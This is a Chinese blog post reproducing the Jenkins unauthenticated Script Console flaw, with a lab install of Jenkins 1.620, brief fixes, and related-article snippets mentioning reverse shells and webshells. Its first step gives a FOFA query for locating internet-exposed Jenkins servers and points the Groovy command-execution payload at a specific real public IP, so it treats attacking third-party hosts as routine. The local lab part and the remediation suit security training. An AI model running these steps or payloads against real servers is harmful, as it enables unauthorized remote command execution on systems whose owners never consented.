Jenkins未授权访问漏洞

已于 2024-08-04 13:45:29 修改
阅读量132 收藏 2
点赞数 8
分类专栏: 未授权访问合集 文章标签: jenkins 运维 网络安全 web安全
于 2024-08-04 13:42:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140903886
版权

Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

漏洞复现

步骤一:使用以下fofa语法进行产品搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令

#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

实在找不到

靶场复现

环境准备

虚拟机centos IP:192.168.30.138
下载安装包,版本1.620.1.1.norach

wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm

在这里插入图片描述

安装Jenkins

rpm -ivh jenkins-1.620-1.1.noarch.rpm

在这里插入图片描述
启动Jenkins服务

service jenkins start

在这里插入图片描述
关闭防火墙或放行8080端口

systemctl stop firewalld.service

访问服务地址
http://192.168.30.138:8080/manage
http://192.168.30.138:8080/script
在这里插入图片描述

#执行命令
println "whoami".execute().text

在这里插入图片描述
在这里插入图片描述

漏洞修复

  1. 升级版本。
  2. 添加认证,设置强密码复杂度及账号锁定。
  3. 禁止把Jenkins直接暴露在公网。
黑白时光les
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jenkins授权访问漏洞记录(端口:7001,80,8080,50000)
墨痕诉清风的博客
11-12 1956
一、漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建 docker pull docker.io/jenkins 开启服务(我执行的第一条命令即可) How to use this image docker run -p 8080:8080 -p 50000:50000 jenkins This will store the workspace
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
jenkins授权访问漏洞总结
qq_45746681的博客
10-05 595
jenkins授权访问漏洞复现 0x00 漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 0x01 漏洞环境搭建(win10) 官方下载jenkins-1.620.zip,下载地址:http://mirrors.jenkins.io 运行setup.exe,安装即可,安装成功后在任务管理器中运行jenkins服务 之后访问http://localhost:8080即可 0x0
授权访问Jenkins授权访问漏洞
qq_68163788的博客
05-10 1295
enkins是一个流行的开源持续集成和持续交付工具,用于自动化软件开发过程中的构建、测试和部署。然而,Jenkins存在一个授权访问漏洞,即攻击者可以通过授权的方式访问Jenkins服务器,可能导致敏感信息泄露、恶意代码执行等安全风险。攻击者可以利用这个漏洞来获取对Jenkins服务器的控制权,进而破坏软件构建过程,篡改部署流程或者窃取敏感数据。为了防范此类漏洞,管理员应该及时更新Jenkins软件版本、配置访问控制策略、监控系统日志等措施来加强安全防护。
Jenkins授权访问漏洞&命令执行
2401_85014013的博客
05-17 455
进入Script Console之后是一个执行脚本的页面查询当前用户查看IP配置信息。
jenkins授权访问漏洞复现
zhangpeng999123的博客
08-25 871
1安装jenkins wget http://download.baiyongjie.com/deploy/jdk-8u45-linux-x64.tar.gz wget http://download.baiyongjie.com/deploy/jenkins_2.121.2.war wget http://download.baiyongjie.com/deploy/apache-tomcat-8.5.4.tar.gz #安装jdk tar zxvf jdk-8u45-linux-x64.ta.
Jenkins授权访问漏洞复现与 getshell 利用方法汇总
W小哥
09-23 6852
一、Jenkins介绍 1.1 什么是JenkinsJenkins是一个开源的、提供友好操作界面的持续集成(CI)工具,起源于Hudson(Hudson是商用的),主要用于持续、自动的构建/测试软件项目、监控外部任务的运行。Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。常用的版本控制工具有SVN、GIT,构建工具有Maven、Ant、Gradle。 1.2 Jenkins的功能 Jenkins是一个基于J
Jenkins授权访问漏洞&命令执行
qq_45434762的博客
03-28 9038
Jenkins授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
jenkins授权访问漏洞
WY92139010的博客
08-04 1223
jenkins授权访问漏洞 一、漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建 1、官方下载jenkins-1.620-1.1.noarch.rpm,下载地址:http://mirrors.jenkins.io 2、在redhat...
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1762
Jenkins授权访问漏洞
99-web漏洞挖掘之授权访问漏洞1
08-03
授权访问漏洞】是指那些本应受到安全配置或权限认证保护的系统资源或服务,由于配置不当,允许任何用户经身份验证即可直接访问。这种漏洞可能导致敏感信息泄露、重要功能被恶意操作,严重威胁企业的数据安全。...
jenkins老版本资源
11-09
应定期更新其安全补丁,并限制对 Jenkins 服务器的访问权限,避免授权的用户进行操作。同时,监控 Jenkins 的日志,及时发现并处理潜在的安全问题。 综上所述,这个压缩包为那些需要使用 Jenkins 老版本的用户...
jenkins publish over ssh
02-10
8. 安全性:确保所有的 SSH 凭据安全存储,并且只授权必要的访问权限。定期更新私钥和密码,避免因安全漏洞导致的数据泄露。 通过正确配置 "Publish Over SSH" 插件,Jenkins 可以成为强大的自动化运维工具,帮助...
jenkins远程ssh部署插件,现已由于安全漏洞jenkins官方下架,需要的自取
02-12
这可能是由于插件中发现了可以被恶意利用的安全风险,例如授权访问、命令注入或者密码泄露等。当这样的问题出现时,为了保护用户的系统安全,官方会采取下架措施,建议用户更新到修复了这些问题的新版本,或者寻找...
搭建jenkins一键部署java项目
最新发布
qx020814的博客
08-03 204
这里我把jenkins的主目录挂载出来了,以防jenkins宕机,重启docker以前的jenkins配置就全没了(不要问我怎么知道的,下载jenkins插件的时候,老容易宕机了,重启了好几次容器)git用于拉取仓库的代码,maven用来构建项目(后续搭建一个本地maven仓库,自己公司写的jar包只能放在公司的服务器上)最上面后续改变一下配置文件的地址,使用自己的配置文件,绑定私有的maven仓库,这样就能使用自己写的jar包了。设置pom文件地址,这是相对于项目的,不需要全局。
nodejs项目
weixin_70751365的博客
07-31 1105
一、基于域名配置server一、基于域名配置server1.一个配置文件一般只有一个http模块2.一个http模块可以有多个server模块3.一个server模块就是一套web项目4.一个server模块中可以有多个location就是项目中的url路由第一步mkdir/zhangmin第二部echo第三步vim第三步http{server{listen80;第四步vim/etc/hosts10curl。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
Lusen的博客
08-02 408
Vulnhub系列Connect-The-Dots靶场做题记录
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 1186
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值